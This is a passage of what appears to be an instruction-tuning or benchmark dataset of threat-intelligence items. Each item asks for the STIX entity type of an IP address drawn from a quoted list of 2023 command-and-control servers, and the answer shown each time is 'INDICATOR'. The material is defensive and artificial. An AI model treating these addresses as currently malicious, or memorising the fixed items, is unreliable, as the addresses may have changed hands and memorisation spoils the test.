31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n158.247.204.242\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n178.128.213.177\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.95.232.51\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n142.93.108.1\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n138.68.110.19\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
